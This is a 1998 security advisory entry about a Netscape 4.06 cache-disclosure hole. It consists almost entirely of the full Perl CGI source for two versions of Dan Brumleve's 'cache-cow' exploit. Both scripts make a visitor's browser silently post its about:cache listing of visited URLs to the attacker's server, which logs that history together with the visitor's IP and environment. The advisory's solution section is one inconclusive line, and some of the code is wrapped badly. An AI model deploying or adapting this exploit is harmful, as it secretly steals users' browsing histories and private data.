COMMAND
Netscape 4.06
SYSTEMS AFFECTED
Systems running Netscape
PROBLEM
Below is source code for the two versions of the Netscape Cache
exploit that was recently discovered by Dan Brumleve as found on
his web site at
http://www.shout.net/~nothing/cache-cow/index.html
First version <cache-cow.cgi>, and then second version
<view-cache-cow-4.06.cgi> listed (both badly wrapped!).
#!/usr/bin/perl
#
# cache-cow.cgi -- Dan Brumleve <nothing@shout.net>, 1998.08.23
my $self = "http://www.shout.net/nothing/cache-cow.cgi";
if ($ENV{PATH_INFO}) {
(my$o=<<" EOF")=~s/\n| //g;print"Content-type: text/html\n\n".$o;
<html><body onLoad="document.f.submit()"><base href="about:"><for
m name=f action=cache method=post><input type=submit></form></body>
</html>
EOF
} elsif ($ENV{CONTENT_LENGTH}) {
my $input;read(STDIN,$input,$ENV{CONTENT_LENGTH});sub unescape{my $s
=shift;$s=~tr/+/ /;$s=~s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;$s;}
sub extract{my($n,$v)=map{unescape($_)}split(/=/,shift);}my$history=
join("\n",sort map{my($n,$v)=extract($_);$v=~s/^about://;$v||();}#=)
split(/&/,{map{extract($_)}split(/&/,$input)}->{cache}))."\n"; open(
FP,">> logs/log-$ENV{REMOTE_ADDR}.txt");for(sort keys %ENV){print FP
$_."=".$ENV{$_}."\n"}print FP "\n".$history."\n";close(FP);print"C".
"ontent-type: text/plain\n\nHere are the URLs retrieved from your ".
"browser:\n\n$history";
} else {
(my$url=<<" EOF")=~s/ |\n//g;print"Location: $url\n\n";
$self/></a></body><script>function chunk(s){return("href=
"+escape(s));}function moo(){if(!document.links.length){return("");
}var str=chunk(document.links[0]);var i=document.links.length;
while(--i){str+="&"+chunk(document.links[i]);}return(str);}
</script><body onLoad="document.f.cache.value=moo();
document.f.submit()"><form action="$self" name=f method=post>
<input type=hidden name=cache><input type=submit></form>
<a href=$self
EOF
}
exit 0;
-----snip-----
-----snip-----
#!/usr/bin/perl
#
# cache-cow-4.06.cgi -- Dan Brumleve <nothing@shout.net>, 1998.09.26
my $self = "http://www.shout.net/nothing/cache-cow-4.06.cgi";
if ($ENV{QUERY_STRING}) {
(my$o=<<" EOF")=~s/\n| //g;print"Content-type: text/html\n\n".$o;
<html><head><script>function chunk(s){return("href=" + escape(s));}
function moo(d){if(!d.l inks.length){return("");} var str=chunk(d.
links[0]);var i=d.links.length;while(--i){str+="&"+chunk(d.links[
i]);} return(s tr);}function check(){ var m=moo(top.cache.document);
if (m=="") { document.location.reload(); return; }document.f.cache.value=m;
doc ument.f.submit();}</script></head><body onLoad="check()"><
form action="$self" name=f target=_top method=post><input type=hidden name=cache><
input type=submit></form></body></html>
EOF
} elsif ($ENV{PATH_INFO}) {
(my$o=<<" EOF")=~s/\n| //g;print"Content-type: text/html\n\n".$o;
<html><body onLoad="document.f.submit()"><base href="about:"><for
m name=f action=cache method=post><input type=submit></form></body>
</html>
EOF
} elsif ($ENV{CONTENT_LENGTH}) {
my $input;read(STDIN,$input,$ENV{CONTENT_LENGTH});sub unescape{my $s
=shift;$s=~tr/+/ /;$s=~s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;$s;}
sub extract{my($n,$v)=map{unescape($_)}split(/=/,shift);}my$history=
join("\n",sort map{my($n,$v)=extract($_);$v=~s/^about://;$v||();}#=)
split(/&/,{map{extract($_)}split(/&/,$input)}->{cache}))."\n"; open(
FP,">> logs/log-$ENV{REMOTE_ADDR}.txt");for(sort keys %ENV){print FP
$_."=".$ENV{$_}."\n"}print FP "\n".$history."\n";close(FP);print"C".
"ontent-type: text/plain\n\nHere are the URLs retrieved from your ".
"browser:\n\n$history";
} else {
print"Content-type: text/html\n\n".<<" EOF";
<html><head> <frameset rows="1,*"><frame src=
"$self?cow" name=cow><frame src="$self/cache"
name=cache></frameset></head></html>
EOF
}
exit 0;
SOLUTION
I don't know if this is covered by 4.5.